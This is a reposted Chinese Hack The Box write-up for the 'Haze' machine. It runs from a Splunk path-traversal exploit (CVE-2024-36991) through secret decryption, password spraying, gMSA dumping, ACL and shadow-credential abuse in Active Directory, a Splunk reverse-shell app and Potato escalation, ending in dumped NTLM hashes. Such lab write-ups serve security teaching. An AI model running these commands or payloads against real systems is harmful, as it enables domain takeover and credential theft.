HTB-Haze笔记

admin 2025年4月6日01:01:16评论1 views字数 5587阅读18分37秒阅读模式
HTB-Haze笔记
扫描靶机
nmap -A -v -T4 10.10.11.61
HTB-Haze笔记
HTB-Haze笔记
可以得到一个dc01.haze.htb域名,并且可以发现一个splunkd的站点,打开看看
HTB-Haze笔记
在网上可以搜到该系统的poc

https://github.com/Mr-xn/CVE-2024-36991

HTB-Haze笔记
直接使用burpsuite抓包,然后利用poc
HTB-Haze笔记
HTB-Haze笔记

可以利用这个poc直接使用LFI漏洞

https://github.com/bigb0x/CVE-2024-36991

python3 CVE-2024-36991.py -u http://haze.htb:8000/
HTB-Haze笔记
成功拿到了一个哈希,但是直接跑rockyou跑不出
:admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1::Administrator:admin:changeme@example.com:::20152:edward:$6$3LQHFzfmlpMgxY57$Sk32K6eknpAtcT23h6igJRuM1eCe7WAfygm103cQ22/Niwp1pTCKzc0Ok1qhV25UsoUN4t7HYfoGDb4ZCv8pw1::Edward@haze.htb:user:Edward@haze.htb:::20152:mark:$6$j4QsAJiV8mLg/bhA$Oa/l2cgCXF8Ux7xIaDe3dMW6.Qfobo0PtztrVMHZgdGa1j8423jUvMqYuqjZa/LPd.xryUwe699/8SgNC6v2H/:::user:Mark@haze.htb:::20152:paul:$6$Y5ds8NjDLd7SzOTW$Zg/WOJxk38KtI.ci9RFl87hhWSawfpT6X.woxTvB4rduL4rDKkE.psK7eXm6TgriABAhqdCPI4P0hcB8xz0cd1:::user:paul@haze.htb:::20152
根据这个splunk的用户文件,直接获得用户配置信息
https://docs.splunk.com/Documentation/Splunk/latest/Admin/Authenticationconf
HTB-Haze笔记
GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk/etc/system/local/authentication.conf$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY= 
HTB-Haze笔记
可以获得他的哈希,但是破解不了,这时候使用splunk专用的

https://github.com/HurricaneLabs/splunksecrets.git

然后找到splunk.secret文件,这个是用来存储 Splunk 实例的加密密钥读取里面编码,在Program Files/Splunk/etc/auth/splunk.secret,因为有空格,所以我编译成url
HTB-Haze笔记
保存本地splunk.secret,然后使用工具破解
splunksecrets splunk-decrypt -S splunk.secret
HTB-Haze笔记
跑出密码是:Ld@p_Auth_Sp1unk@2k24,然后根据之前在配置文件里面拿到的用户名,枚举一下用户名
netexec smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-bruteAdministratorGuestkrbtgtpaul.taylormark.adamsedward.martinalexander.greenDC01$Haze-IT-Backup$
HTB-Haze笔记
做成用户字典,然后枚举登录winrm
netexec winrm haze.htb -u users.txt -p 'Ld@p_Auth_Sp1unk@2k24'
HTB-Haze笔记
看来mark.adams用户适配密码,直接登录winrm
evil-winrm -i haze.htb -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24'
HTB-Haze笔记
查看当前用户的组,可以看到在gMSA_Managers组里面,使用gMSADumper工具

https://github.com/micahvandeusen/gMSADumper

HTB-Haze笔记
python3 gMSADumper.py -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -l dc01.haze.htb
HTB-Haze笔记
然后授权mark.adams用户权限,以便查看Haze-IT-Backup$账号信息
Set-ADServiceAccount -Identity Haze-IT-Backup$ -PrincipalsAllowedToRetrieveManagedPassword "mark.adams"
HTB-Haze笔记
成功设置后继续使用gMSADumper工具导出哈希
python3 gMSADumper.py -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -l dc01.haze.htbaze-IT-Backup$:::735c02c6b2dc54c3c8c6891f55279ebcHaze-IT-Backup$:aes256-cts-hmac-sha1-96:38c90a95f7e038a6cb57d3e21c405c2875e88f1edbb1e082f1dd75d01eda60fdHaze-IT-Backup$:aes128-cts-hmac-sha1-96:0926f5e64d85018a506ecadff3df4f95
HTB-Haze笔记
上传SharpHound获得内网信息,然后进去看看
HTB-Haze笔记
可以看到[email protected]用户指向[email protected]组,并且是WriteOwner关系,说明意该用户可以修改该组的所有者,从而可能导致权限提升
https://youtu.be/fqYoOoghqdE
HTB-Haze笔记
使用impacket里面owneredit工具
impacket-owneredit -action write -target 'SUPPORT_SERVICES' -new-owner 'HAZE-IT-BACKUP$' haze.htb/'HAZE-IT-BACKUP$' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -dc-ip haze.htb
HTB-Haze笔记
然后更换到dacl工具取得权限
impacket-dacledit -action write -rights FullControl -target 'SUPPORT_SERVICES' -principal 'HAZE-IT-BACKUP$' haze.htb/'HAZE-IT-BACKUP$' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -dc-ip haze.htb
HTB-Haze笔记
然后使用先生成IT的i票据,然后导出
python3 getTGT.py haze.htb/Haze-IT-Backup$ -hashes ':a70df6599d5eab1502b38f9c1c3fd828'export KRB5CCNAME=Haze-IT-Backup$.ccache
HTB-Haze笔记
使用bloodyAD工具将Haze.htb域中dc01.haze.htb上的“SUPPORT_SERVICES”AD对象的所有者更改为Haze IT Backup$
bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u $'Haze-IT-Backup$' -k set owner "SUPPORT_SERVICES" $'Haze-IT-Backup$'
利用booldyAD授予Haze IT Backup$对dc01.Haze.htb上Active Directory中的SUPPORT_SERVICES用户对象的GenericAll权限(完全控制)
bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u 'Haze-IT-Backup$' -k add genericAll "CN=SUPPORT_SERVICES,CN=Users,DC=haze,DC=htb" 'Haze-IT-Backup$'
HTB-Haze笔记
然后将Haze IT Backup$添加为dc01.Haze.htb上Active Directory中SUPPORT_SERVICES组的成员。
bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u 'Haze-IT-Backup$' -k add groupMember "SUPPORT_SERVICES" 'Haze-IT-Backup$'
然后进行影子凭证攻击
bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u 'Haze-IT-Backup$' -p ':a70df6599d5eab1502b38f9c1c3fd828' add shadowCredentials "edward.martin"
HTB-Haze笔记
生成一个新的密码
openssl pkcs12 -export -out ikun.pfx -inkey AyYeZBye_priv.pem -in AyYeZBye_cert.pem
HTB-Haze笔记
然后使用certipy工具获取edward.martin用户的哈希
certipy auth -pfx ikun.pfx -u 'edward.martin' -domain haze.htb -dc-ip 10.10.11.61 -debugaad3b435b51404eeaad3b435b51404ee:09e0b3eeb2e7a6b0d419e9ff8f4d91af
HTB-Haze笔记
直接使用哈希登录winrm
evil-winrm -i 10.10.11.61 -u edward.martin -H 09e0b3eeb2e7a6b0d419e9ff8f4d91af
HTB-Haze笔记
在C:backupsSplunk里面有splunk的压缩包,下载下来
HTB-Haze笔记
下载完后然后翻一下垃圾,在Splunk/etc/auth/有个splunk.secret,然后在Splunk/var/run/splunk/confsnapshot/baseline_local/system/local/有个authentication.conf配置文件,直接之前的类似进行破解
HTB-Haze笔记
HTB-Haze笔记
HTB-Haze笔记
成功破解出密码是:Sp1unkadmin@2k24,然后直接登录splunk页面
HTB-Haze笔记
登录成功了,github有个专门的splunk反弹shell

https://github.com/0xjpuff/reverse_shell_splunk

HTB-Haze笔记
HTB-Haze笔记
然后将其打包成spl格式,然后上传,成功反弹shell
HTB-Haze笔记
输入whomi /priv,可以看到SeImpersonatePrivilege已经开启了,直接土豆梭哈
HTB-Haze笔记
HTB-Haze笔记
                                                                                                                                ss *                                                                                                                                         Administrator:500:aad3b435b51404eeaad3b435b51404ee:06dc954d32cb91ac2831d67e3e12027f:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:937e28202a6cdfcc556d1b677bcbe82c:::paul.taylor:1103:aad3b435b51404eeaad3b435b51404ee:e90878e2fb0a21a11859ff60f1119fb4:::mark.adams:1104:aad3b435b51404eeaad3b435b51404ee:e90878e2fb0a21a11859ff60f1119fb4:::edward.martin:1105:aad3b435b51404eeaad3b435b51404ee:09e0b3eeb2e7a6b0d419e9ff8f4d91af:::alexander.green:1106:aad3b435b51404eeaad3b435b51404ee:6b8caa0cd4f8cb8ddf2b5677a24cc510:::DC01$:1000:aad3b435b51404eeaad3b435b51404ee:9dcbc33adec3bdc8b2334060002ce1b4:::Haze-IT-Backup$:1111:aad3b435b51404eeaad3b435b51404ee:a70df6599d5eab1502b38f9c1c3fd828:::

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月6日01:01:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HTB-Haze笔记http://cn-sec.com/archives/3919843.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息